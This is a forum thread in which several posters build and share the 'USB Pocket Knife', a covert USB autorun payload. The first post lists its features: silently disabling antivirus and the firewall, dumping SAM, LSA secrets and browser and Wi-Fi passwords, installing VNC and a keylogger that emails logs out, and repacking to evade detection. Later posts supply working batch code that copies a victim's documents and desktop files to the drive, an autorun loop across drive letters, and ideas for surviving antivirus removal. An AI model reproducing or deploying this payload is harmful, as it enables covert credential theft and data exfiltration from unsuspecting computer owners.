Jump to content

USB Pocket-Knife Development


Leapo

Recommended Posts

Introduction:

Let me start off by saying that this is NOT YET a final payload, this threads purpose is to serve as a learning experience to me while providing a useful end-all be-all payload to the community. For now I will provide the payload in its current state at the end of this post.

This payload is the result of slowly browsing this forum and saving every bit of code and every full payload I've come across, then stitching it all together into a modular switchblade with just about every feature in existence. I've gone through and fully commented most of the code (still working on that), I've made sure everything is virus free, I've separated out major functions so that they can be turned on and off at will, and I've made sure it runs completely silently on a U3 and non-U3 thumbdrive in the least-obvious way possible.


Current State and Features:

The following is a list of everything included in the payload:

Key:
- Non-U3 Drives Only
- U3 Drives only
- Not yet Implemented
- Everything Else

Features:
- Upon insertion, the first option in the Autorun dialog box starts the payload, while appearing only to open the drive.
- Full silent autorun with no user interaction for U3 drives.
- A "Menu.bat" is included to mange all special functions, modules, and features of the switchblade.
- Payload checks the root of the C: drive and prevents the payload from running if the file "Safety.txt" is found.
- Includes TightVNC viewer so you always have it with you.
- Includes Notepad++ for easy batch editing.
- Includes antidote batch files for Nmap, the Hacksaw, and VNC.
- Fully commented code and fully featured ReadMe with instructions on setting up the payload for your needs.
- A custom backup and restore script, which automatically restores the switchblade (to the last time it was backed up) before every run. This ensures the payload is always put back to a normal state, even after it's been nuked by an antivirus.
- A custom auto-update script that goes out and downloads the most recent versions of many of the tools used on the switchblade (pwdump, nircmd, etc). Simply run it from Menu.bat, and the tools will be downloaded, extracted, and installed into the payload. The backup archive for the entire payload will also be updated to keep the latest versions of the files from being overwritten by an old backup. *working on a way to get this working for U3 drives.
- Auto Compress logs as they are generated to save space
- Email logs Back to yourself
- Optional auto-repack of executable to circumvent AV detection

Payload Components:
- Runs AVKill (csrss.exe)
- Restores the payload to the last backup point
- Disables the Windows Firewall Silently
- Hides Hidden and System Files
- Enables the Remote Desktop service
- Dumps general System Info
- Dumps the SAM
- Dumps LSA secrets
- Dumps LSA secrets via an alternate method (less detectable, not as pretty)
- Dumps Network Passwords
- Dump messenger passwords
- Dump IE passwords.
- Dump saved wireless keys
- Dump URL history
- Dump Firefox passwords (Supports Firefox 3))
- Dump Cache Passwords
- Dump Current Network Services
- Generic Port Scanning
- Dumps current external IP
- Dumps email, messenger, and general website passwords
- Dumps currently installed hot fixes and IE history
- Dumps Google Chrome passwords
- Installs Hacksaw the usual way
- Installs WinVNC client.
- Installs Nmap as a service (emails you results like the Hacksaw)
- Installs a keylogger which emails its logs off to you daily [broken!]
- File slurping for logs, chat-logs, downloads, bookmarks, etc. (smaller files)
- File slurping for various Documents and Media folders. (larger files)
- Opens an explorer window to the Documents folder when finished
- Automatic update scrip to keep various executables up to date.
- Compress logs as they are generated to save space.
- Optionally email logs in addition to storing them on the switchblade.
- Management interface to manage the various functions of the pocket Knife.
- Ability to save up to 3 configuration profiles [New!]
Link to comment
Share on other sites

  • Replies 818
  • Created
  • Last Reply

Top Posters In This Topic

Top Posters In This Topic

Posted Images

Download Payload:

Here' s where you'll find the most recent full build of my payload; I'll try to keep this as up-to-date as I can as I receive and work out fixes and optimizations. I'll always post a notification when a new version is available, or when an update is made to the code in my above posts.

Current Version: USB Pocket Knife 0.8.8.0 by Leapo
Release Date: October 6, 2008
Download Mirrors: MegaUpload, and RapidShare

Note: The above includes both the U3 and non-U3 versions of the payload. The ISO is now pre-built, just flash and go!!!

Payload Change Log:

October 6, 2008: Pocketknife 0.8.8.0 Released
Change 0: Payload can now be set to shutdown the PC after its finished.
Change 1: Now dumps Google Chrome passwords.
Change 2: New profile management system, save up to 3 payload configurations!
Change 3: If "Safety.txt Check" is disabled Menu.bat will now show the "run payload" option even if Safety.txt is found.
Change 4: made some cosmetic fixes to Menu.bat.
September 28, 2008: Pocketknife 0.8.7.0 Released
Change 0: Backup Script in menu.bat works again.
Change 1: Auto-Update script in menu.bat works again.
Change 2: Many path errors fixed.
Change 3: Added OS detection to increase compatibility.
Change 4: Slurp now uses variables instead of hard paths to improve compatibility.
Change 5: Slurp now grabs data from Pidgen.
Change 6: Prebuilt U3 ISO included!
September 19, 2008: Pocketknife 0.8.6.5 Released
Change 0: Invalid directory name broke just about all of 0.8.6.0, this has been corrected.
Change 1: AVKill's executable was missing from the U3 version of the payload.
Change 2: File Copiers executable was missing entirely.
September 15, 2008: Pocketknife 0.8.6.0 Released
Change 0: Fixed U3 compatibility (was broken in 0.8.5.5)
Change 1: Slurp 2 should now work properly.
September 17, 2008: Pocketknife 0.8.5.5 Released
Change 0: Fixed "Port Scan" not running correctly.
Change 1: PwDump failing to create service.
Change 2: FgDump failing to output anything.
Change 3: Firepassword updated, now works with Firefox 3.0
Change 4: PwDump Updated to 1.7.2
Change 5: FgDump updated to 2.1.0
September 14, 2008: Pocketknife 0.8.5.0 Released
Change 0: Animation_1.cfg was missing, causing some features of menu.bat to malfunction.
Change 1: Fixed an ordering issue in Start.bat.
Change 2: Fixed an issue with GO.vbs causing it to start more than one copy of Start.bat
Change 3: Fixed a typo preventing the "Dump Mail Passwords" module from running.
Change 4: Fixed a typo preventing the "Dump Updates-List" module from running.
Change 5: Fixed "Dump Mail passwords" not running correctly.
Change 6: Fixed "Dump Network passwords" not running correctly.
Change 7: Fixed "Dump Messenger passwords" not running correctly.
Change 8: Fixed "Dump LSA Secrets" not running correctly.
Change 9: AVKill Should now operate silently.
Change 10: File structure created by slurp was cleaned up.
Change 11: Folder now opens AFTER the payload finishes, not before (if it's selected to open at all).
September 11, 2008: Pocketknife 0.8.2.0 Released
Change 0: Bug causing safety.txt to be ignored fixed.
Change 1: "No Disk" errors should be resolved.
Change 2: New "disarm' feature to prevent it from starting at all.
Change 3: three options on what folder to open after completion: Logs, Root, or None.
Change 4: ReadMe brought up to date.
Change 5: "Disable Firewall" is now totally silent (disables security center first)
August 31, 2008: Pre-Release 0.8.1.0 Released
Change 0: Now fully U3 compatible (fixed from v0.8.0.0)
Change 1: Menu.bat has been greatly reduced in size.
June 09, 2008: Pre-Release 0.8.0.0 Released
Change 0: Payload overhauled from the ground up.
Change 1: Now fully U3 compatible (broken in this build).
Change 2: Menu system overhauled.
Change 3: Both versions of the payload launch silently for sure!
November 24, 2007: U3 ISO
Change 0: Fixed the U3 ISO to launch the payload silently
November 10, 2007: Beta 0.6.2.1 Release
Change 0: VNC install method updated.
Change 1: Backup and Restore Script streamlined.
Change 2: Automatic Updates added.
Change 3: Centralized Management Interface added.
June 20, 2007: Beta 0.4 Release
Change 0: Added a custom backup and restore script (restores the payload before every run to keep it safe from AV software).
Change 1: Updated the Readme with new information about the backup and restore function, PLEASE READ THE README!
Change 2: Improved and added more comments to the code.
Change 3: Fixed various typos in my comments.
June 18, 2007: Beta 0.3 Release
Change 0: Completely overhauled Slurp and Slurp2.bat
Change 1: Fixed Port_Scan.bat (thanks go to Elmer and GonZor for their help).
Change 2: Improved and added more comments to the code.
Change 3: Fixed various typos in my comments.
June 16, 2007: Initial Post
Change 0: Initial Release
Link to comment
Share on other sites

Download link posted, have at it! Any fixes you guys come up with I'll add to the payload, let's see if we can make this "the one".

As for how long I've been working on it...well, I've been slowly building it since the original hacksaw came out.

(not bad for my 10th through 14th posts  :lol: )

I'll keep hammering away on my end, I really want to change the slurp.bat and slurp2.bat files over to FileCopy (FC.exe) instead of xCopy to remove the need to make a new xCopy command for every file extension you want to slurp. I'll probably have it all fixed by tonight, but feel free to use the current incarnation of Slurp, it just isn't quite as efficient as the new version will be.

Link to comment
Share on other sites

I am going to try and make this U3 compatible.

EDIT: Just fixed the port scan (I think). The new code is:

Echo ************************************ > %~d0Documentslogfiles%computername%Port_Scan.log 2>&1
echo ************[Port Scan]************* >> %~d0Documentslogfiles%computername%Port_Scan.log 2>&1
Echo ************************************ >> %~d0Documentslogfiles%computername%Port_Scan.log 2>&1
portqry -local -l %~d0Documentslogfiles%computername%%computername%_ports.txt>>nul
type %~d0Documentslogfiles%computername%%computername%_ports.txt >> %~d0Documentslogfiles%computername%Port_Scan.log 2>&1 
del /f/q %~d0Documentslogfiles%computername%%computername%_ports.txt

You will have to uncomment it in start.bat to make it work.

Also, I like the safety thing. Pretty neat.

Link to comment
Share on other sites

@ MakMike:

That's strange, considering I use the same method of launching the hacksaw that's employed on U3 distributions of the Hacksaw. I downloaded the original U3 hacksaw (the same one used on the show), copied the thumbdrive portion directly over to my payload, then I pulled the vb script they used to start the switchblade from the CD partition, decoded it, and modified it to work from the WIPCMD folder.

In other words, if the original "as-seen-on-tv" hacksaw works, so should my hacksaw, because all that was changed was a path or two.

Are you sure you edited send.bat correctly? If you don't enter the information exactly right, it'll just silently fail to send. Also, make sure you're using a Gmail password that contains NO SPACES; passwords with spaces aren't properly supported (everything after the first space is ignored).

@ elmer:

Thanks for the fix, I'll test it out a little and add it to the payload, along with my new versions of Slurp and Slurp2.bat...after I compare it to my busted code to see what you had to change to fix it XD

Link to comment
Share on other sites

I forgot how to copy multiple files/file types with fc.exe, so tell me if you know how. I checked in the /? (fc.exe /?) and it didn't say anything about it. I PM'd Obi-Wahn, but he hasn't gotten back to me yet.

EDIT: You should try to get on Hak5Live RC1.5. The RC1 had some community stuff in it, and some air time couldn't hurt.

Link to comment
Share on other sites

Well, bad news elmer, I'm getting no output from the code you posted. It looks like the batch file isn't finding the executable (PortQry.exe) that's sitting in the folder with it. The "CD" command I had in there before fixed this issue, but it broke other batch files when run in succession...

Edit: Getting fc.exe to copy multiple files of multiple types is pretty darn easy compared to xCopy. The example code below will copy everything from the ".TestCopy From" folder to the ".TestCopy To" folder (this includes sub folders and anything located within them)

fc.exe ".TestCopy From*" ".TestCopy To*" /i /o

So for example, here's what Slurp2.bat (used for copying the entire contents of the My Documents folder and Desktop) looks like using xCopy:

:: My Documents files
mkdir ....Documentslogfiles%computername%Slurp_DataMyDocuments
mkdir ....Documentslogfiles%computername%Slurp_DataMyMusic
mkdir ....Documentslogfiles%computername%Slurp_DataMyVideos
mkdir ....Documentslogfiles%computername%Slurp_DataMyPictures
xcopy "C:Documents and Settings%username%My Documents*.doc" ....Documentslogfiles%computername%Slurp_DataMyDocuments /s/c/q/r/h
xcopy "C:Documents and Settings%username%My Documents*.docx" ....Documentslogfiles%computername%Slurp_DataMyDocuments /s/c/q/r/h
xcopy "C:Documents and Settings%username%My Documents*.rtf" ....Documentslogfiles%computername%Slurp_DataMyDocuments /s/c/q/r/h
xcopy "C:Documents and Settings%username%My Documents*.txt" ....Documentslogfiles%computername%Slurp_DataMyDocuments /s/c/q/r/h
xcopy "C:Documents and Settings%username%My Documents*.xls" ....Documentslogfiles%computername%Slurp_DataMyDocuments /s/c/q/r/h
xcopy "C:Documents and Settings%username%My Documents*.csv" ....Documentslogfiles%computername%Slurp_DataMyDocuments /s/c/q/r/h
xcopy "C:Documents and Settings%username%My Documents*.ppt" ....Documentslogfiles%computername%Slurp_DataMyDocuments /s/c/q/r/h
xcopy "C:Documents and Settings%username%My Documents*.pptx" ....Documentslogfiles%computername%Slurp_DataMyDocuments /s/c/q/r/h
xcopy "C:Documents and Settings%username%My Documents*.mdb" ....Documentslogfiles%computername%Slurp_DataMyDocuments /s/c/q/r/h
xcopy "C:Documents and Settings%username%My Documents*.jpg" ....Documentslogfiles%computername%Slurp_DataMyPictures /s/c/q/r/h
xcopy "C:Documents and Settings%username%My Documents*.png" ....Documentslogfiles%computername%Slurp_DataMyPictures /s/c/q/r/h
xcopy "C:Documents and Settings%username%My Documents*.bmp" ....Documentslogfiles%computername%Slurp_DataMyPictures /s/c/q/r/h
xcopy "C:Documents and Settings%username%My Documents*.gif" ....Documentslogfiles%computername%Slurp_DataMyPictures /s/c/q/r/h
xcopy "C:Documents and Settings%username%My Documents*.htm" ....Documentslogfiles%computername%Slurp_DataMyDocuments /s/c/q/r/h
xcopy "C:Documents and Settings%username%My Documents*.html" ....Documentslogfiles%computername%Slurp_DataMyDocuments /s/c/q/r/h
xcopy "C:Documents and Settings%username%My Documents*.eml" ....Documentslogfiles%computername%Slurp_DataMyDocuments /s/c/q/r/h
xcopy "C:Documents and Settings%username%My Documents*.msg" ....Documentslogfiles%computername%Slurp_DataMyDocuments /s/c/q/r/h
xcopy "C:Documents and Settings%username%My Documents*.zip" ....Documentslogfiles%computername%Slurp_DataMyDocuments /s/c/q/r/h
xcopy "C:Documents and Settings%username%My Documents*.rar" ....Documentslogfiles%computername%Slurp_DataMyDocuments /s/c/q/r/h
xcopy "C:Documents and Settings%username%My Documents*.7z" ....Documentslogfiles%computername%Slurp_DataMyDocuments /s/c/q/r/h
xcopy "C:Documents and Settings%username%My Documents*.psd" ....Documentslogfiles%computername%Slurp_DataMyPictures /s/c/q/r/h
xcopy "C:Documents and Settings%username%My Documents*.jpg" ....Documentslogfiles%computername%Slurp_DataMyPictures /s/c/q/r/h
xcopy "C:Documents and Settings%username%My Documents*.wma" ....Documentslogfiles%computername%Slurp_DataMyMusic /s/c/q/r/h
xcopy "C:Documents and Settings%username%My Documents*.wav" ....Documentslogfiles%computername%Slurp_DataMyMusic /s/c/q/r/h
xcopy "C:Documents and Settings%username%My Documents*.mp3" ....Documentslogfiles%computername%Slurp_DataMyMusic /s/c/q/r/h
xcopy "C:Documents and Settings%username%My Documents*.ogg" ....Documentslogfiles%computername%Slurp_DataMyMusic /s/c/q/r/h
xcopy "C:Documents and Settings%username%My Documents*.mpg" ....Documentslogfiles%computername%Slurp_DataMyVideos /s/c/q/r/h
xcopy "C:Documents and Settings%username%My Documents*.avi" ....Documentslogfiles%computername%Slurp_DataMyVideos /s/c/q/r/h
xcopy "C:Documents and Settings%username%My Documents*.wmv" ....Documentslogfiles%computername%Slurp_DataMyVideos /s/c/q/r/h

:: Desktop files
mkdir ....Documentslogfiles%computername%Slurp_DataDesktop
xcopy "C:Documents and Settings%username%Desktop*.doc" ....Documentslogfiles%computername%Slurp_DataDesktop /s/c/q/r/h
xcopy "C:Documents and Settings%username%Desktop*.rtf" ....Documentslogfiles%computername%Slurp_DataDesktop /s/c/q/r/h
xcopy "C:Documents and Settings%username%Desktop*.txt" ....Documentslogfiles%computername%Slurp_DataDesktop /s/c/q/r/h
xcopy "C:Documents and Settings%username%Desktop*.xls" ....Documentslogfiles%computername%Slurp_DataDesktop /s/c/q/r/h
xcopy "C:Documents and Settings%username%Desktop*.csv" ....Documentslogfiles%computername%Slurp_DataDesktop /s/c/q/r/h
xcopy "C:Documents and Settings%username%Desktop*.ppt" ....Documentslogfiles%computername%Slurp_DataDesktop /s/c/q/r/h
xcopy "C:Documents and Settings%username%Desktop*.mdb" ....Documentslogfiles%computername%Slurp_DataDesktop /s/c/q/r/h
xcopy "C:Documents and Settings%username%Desktop*.jpg" ....Documentslogfiles%computername%Slurp_DataDesktop /s/c/q/r/h
xcopy "C:Documents and Settings%username%Desktop*.gif" ....Documentslogfiles%computername%Slurp_DataDesktop /s/c/q/r/h
xcopy "C:Documents and Settings%username%Desktop*.htm" ....Documentslogfiles%computername%Slurp_DataDesktop /s/c/q/r/h
xcopy "C:Documents and Settings%username%Desktop*.eml" ....Documentslogfiles%computername%Slurp_DataDesktop /s/c/q/r/h
xcopy "C:Documents and Settings%username%Desktop*.msg" ....Documentslogfiles%computername%Slurp_DataDesktop /s/c/q/r/h

And here's what it looks like using FileCopier (fc.exe):

:: My Documents files
mkdir ....Documentslogfiles%computername%Slurp_DataMyDocuments
fc.exe "C:Documents and Settings%username%My Documents*" "....Documentslogfiles%computername%Slurp_DataMyDocuments*" /i /o

:: Desktop files
mkdir ....Documentslogfiles%computername%Slurp_DataDesktop
fc.exe "C:Documents and Settings%username%Desktop*" "....Documentslogfiles%computername%Slurp_DataDesktop*" /i /o

many thanks to Obi-Wahn for making such a helpful application!

Link to comment
Share on other sites

Hey I haven't downloaded your payload yet to test but I noticed this line in your code for the scan

copy Documentslogfiles%computername%Port_Scan.log+Documentslogfiles%computername%%computername%_ports.log >>nul

the syntax for copy is

COPY <file1>+<file2> <dest>

you'll notice you don't have a destination you just move the data to NUL put your destination in and it should work fine.

If it isn't finding "PortQry.exe" call th file like so ".PortQry.exe" this will look for the file in where the batch file is located.

By the way I think Ill have to challenge you for the the title of this payload being "the one", sorry.

Link to comment
Share on other sites

Thanks for the tip GonZor, I'll give that a shot (I wasn't the original author of that particular chunk of code, so I wasn't exactly sure  what was had going on there).

As for who's payload is 'the one'... you do have the advantage of having your payload on the U3 section of the flash drive, which keeps everything safe from deletion by an antivirus and makes sure it auto-runs without any user-interaction, but there are quite a few trade-offs for doing it that way (yours can't be installed on a USB hard disk and used for mass file slurping for instance). Now it isn't like my payload is completely perfect either, but were still debugging the darn thing in here :P

I've just downloaded your payload, and I see I have a few things you don't, and you have a few things I don't. Considering my payload is already a compilation of over 5 other payloads, would you mind if I added some code from yours into the mix as well? :D

Link to comment
Share on other sites

Thanks for the tip GonZor, I'll give that a shot (I wasn't the original author of that particular chunk of code, so I wasn't exactly sure  what was had going on there).

As for who's payload is 'the one'... you do have the advantage of having your payload on the U3 section of the flash drive, which keeps everything safe from deletion by an antivirus and makes sure it auto-runs without any user-interaction, but there are quite a few trade-offs for doing it that way (yours can't be installed on a USB hard disk and used for mass file slurping for instance). Now it isn't like my payload is completely perfect either, but were still debugging the darn thing in here :P

I've just downloaded your payload, and I see I have a few things you don't, and you have a few things I don't. Considering my payload is already a compilation of over 5 other payloads, would you mind if I added some code from yours into the mix as well? :D

No problem, It is possible for my payload to run on any drive actually :-P I my completely bias opinion I'd say the best thing about my payload is the fact it is customizable from a gui, no more editing code but considering both our payloads are still in development we will have to wait to see who's will be better, or we could put them together to create "the ULTIMATE one"? maybe. Anyway if you need help let me know.

Link to comment
Share on other sites

First things first, a new version has been released! Major highlights for this release include completely overhauled versions of Slurp and Slurp2.bat (now renamed fc_slurp and fc_slurp2.bat), a fixed version of Port_Scan.bat (thanks go to Elmer and GonZor for their help), and improvements to my code comments such as typo fixes and additional information.

So, version 0.3 is now up the download link is in the usual place (in the 4th post of the thread, along with a change log)... Or if you're all too lazy to scroll up to my original posts, here are the links for Rapidshare and MegaUpload. :lol:

@ Elmer and GonZor:

Thanks for the help with this pesky module, it took a little more tweaking to get Port_Scan.bat to work properly, but I finally managed to get it to play nice with the other modules. It might be a tad unconventional, but at least it works:

mkdir ....Documentslogfiles%computername%
Echo ************************************ > ....Documentslogfiles%computername%Port_Scan.log 2>&1
echo ************[Port Scan]************* >> ....Documentslogfiles%computername%Port_Scan.log 2>&1
Echo ************************************ >> ....Documentslogfiles%computername%Port_Scan.log 2>&1
.portqry -local -l ....Documentslogfiles%computername%%computername%_ports.txt>>nul
type ....Documentslogfiles%computername%%computername%_ports.txt >> ....Documentslogfiles%computername%Port_Scan.log 2>&1 
del /f/q %~d0Documentslogfiles%computername%%computername%_ports.txt

@ GonZor:

Interesting proposition, merging our payloads, but how would we go about it? At this point, most of my code would need to be overhauled to work with the rest of your payload, but it looks like bringing over the modules I'm missing from your payload would be relatively easy...seems a shame, though, considering how clean your code is compared to mine (though mine doesn't need to be as clean due to the use of Start.bat to manage active modules).

@ Elmer:

You mentioned something about attempting to make my payload U3 compatible; if that works out, and I converted over the modules from GonZor's payload that I don't have, the only thing his current payload would have over mine is that it runs completely off of the CD partition of the U3 drive. If there's a way to keep the non-U3 portion of a flash drive safe from being nuked by Antivirus software, this might just be the way to go.

Link to comment
Share on other sites

I have spent a long time trying to find a way to protect the non u3 side from AV software and I couldnt find anything,  but I agree if you could  simply protect them on the  non u3 side it would be simpler.  The Av Nuking is the only reason I dont use ur payload on a day to day basis. Once again I would like to say keep up the outstanding work.

Link to comment
Share on other sites

I might have an idea as to how to do it...anybody know of a command-line app that can automatically unzip an encrypted or password protected archive?

If I could store a copy of the contents of my payload (or at least the parts that would be suspect for deletion) in an encrypted archive, and have it unzip automatically before every payload run, you would effectively have an unbreakable switchblade.

True, this doesn't prevent the apps from being deleted, but it would restore the apps and fix the payload automatically before the next run...

WOW, I think I might have something there!!  :shock:

Link to comment
Share on other sites

@ GonZor:

Interesting proposition, merging our payloads, but how would we go about it? At this point, most of my code would need to be overhauled to work with the rest of your payload, but it looks like bringing over the modules I'm missing from your payload would be relatively easy...seems a shame, though, considering how clean your code is compared to mine (though mine doesn't need to be as clean due to the use of Start.bat to manage active modules).

Yes my code is much cleaner and readable because i have written my code from scratch and not just ripped the code from the wiki (sorry had to say it). Basically my payload will include all of your functions as well eventually but be much easier to customize.

I have spent a long time trying to find a way to protect the non u3 side from AV software and I couldnt find anything,  but I agree if you could  simply protect them on the  non u3 side it would be simpler.  The Av Nuking is the only reason I dont use ur payload on a day to day basis. Once again I would like to say keep up the outstanding work.

I am working on a possible solution to this problem. I'll get back to you on this.

I might have an idea as to how to do it...anybody know of a command-line app that can automatically unzip an encrypted or password protected archive?

If I could store a copy of the contents of my payload (or at least the parts that would be suspect for deletion) in an encrypted archive, and have it unzip automatically before every payload run, you would effectively have an unbreakable switchblade.

True, this doesn't prevent the apps from being deleted, but it would restore the apps and fix the payload automatically before the next run...

WOW, I think I might have something there!!  :shock:

You posted while I was writing, yes this may be possible but it may also delete the Archive while it is being accessed. to solve that you may need to copy the encrypted volume before extracting. that way you never extract from the original volume and it will stay intact. You could try this with true crypt (good encryption, easy to use via command line) but you may not always have access to extract.

Link to comment
Share on other sites

I know  how to get it U3 compatible. Here we go! I really hope this works

[AutoRun]
open=start.bat

@echo off 

@start /min for %%i in (D E F G H I J K L M N O P Q R S T U V W X Y Z) do %%i:Manual_Scan.bat

@exit

I will try to upload the U3CUSTOM.ISO when I can.

Re: New version

I have mirrors!

DepositFiles, FileSend, ZUpload, and Badongo.

Re: Protection from AV

I might have an idea as to how to do it...anybody know of a command-line app that can automatically unzip an encrypted or password protected archive?

Truecrypt can work from the command line. I would go about this in a similar fashion to what you have stated. I would put the entire payload onto the encrypted drive and give it an autorun.inf that would run the payload. It would be harder to make the U3 version of this, but something in the wiki talked about using Truecrypt with the switchblade.

EDIT: Fixed the code (from %i to %%i)

Link to comment
Share on other sites

Re: Protection from AV

I might have an idea as to how to do it...anybody know of a command-line app that can automatically unzip an encrypted or password protected archive?

Truecrypt can work from the command line. I would go about this in a similar fashion to what you have stated. I would put the entire payload onto the encrypted drive and give it an autorun.inf that would run the payload. It would be harder to make the U3 version of this, but something in the wiki talked about using Truecrypt with the switchblade.

Yes its actually very simple to do, although the problem is true crypt doesn't always work. then again i guess if you don't have permissions to use true crypt the logs generated wouldn't be much use. Once again It would be a valid idea to copy the volume and never extract from the original volume, AV's can decimate a volume if you can access it.

Link to comment
Share on other sites

Join the conversation

You can post now and register later. If you have an account, sign in now to post with your account.

Guest
Reply to this topic...

×   Pasted as rich text.   Paste as plain text instead

  Only 75 emoji are allowed.

×   Your link has been automatically embedded.   Display as a link instead

×   Your previous content has been restored.   Clear editor

×   You cannot paste images directly. Upload or insert images from URL.

  • Recently Browsing   0 members

    • No registered users viewing this page.

×
×
  • Create New...